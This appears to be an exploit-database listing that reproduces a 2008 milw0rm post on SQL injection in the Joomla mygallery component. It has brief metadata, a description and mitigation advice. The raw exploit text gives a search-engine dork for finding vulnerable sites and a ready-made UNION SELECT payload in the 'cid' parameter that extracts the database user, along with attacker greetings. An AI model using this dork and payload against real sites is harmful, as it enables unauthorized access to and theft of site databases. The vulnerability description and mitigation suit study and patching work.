Joomla Component mygallery Remote SQL Injection Exploit

vendor:

mygallery Joomla Component

by:

HouSSamix From H-T TeaM

CVSS

HIGH

Remote SQL Injection

CWE

Product Name: mygallery Joomla Component

Affected Version From: Unknown

Affected Version To: Unknown

Patch Exists: N/A

Related CWE: N/A

CPE: N/A

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2008

Joomla Component mygallery Remote SQL Injection Exploit

The vulnerability exists due to insufficient sanitization of user-supplied input passed via the 'cid' parameter to the 'index.php' script. A remote attacker can execute arbitrary SQL commands in application's database, cause denial of service, access or modify sensitive data, exploit vulnerabilities in the underlying database and in certain cases execute arbitrary code on the system.

Mitigation:

Input validation should be used to prevent SQL injection attacks. All input data should be validated and filtered, and special characters should be escaped before being passed to the database.

Source

Exploit-DB raw data:

               H-T Team { HouSSamix & ToXiC350 }
=====================================================================
     Joomla Component mygallery Remote SQL Injection Exploit
=====================================================================

## AUTHOR :  HouSSamix From H-T TeaM

## Script :  mygallery Joomla Component ( version unknown )

## DorKs :  inurl:index.php?option=com_mygallery "cid"
			
## EXPLOIT :

index.php?option=com_mygallery&func=viewcategory&cid=-1%20union%20select%201,2,user(),4,5,6,7,8,9,10,11,12--

## Note : the number of columns can be diffrent .

## GREETZ  :  CoNaN & Islam security Team & Mr l3frite & Mounita20 and all musulmans hackers

# milw0rm.com [2008-07-01]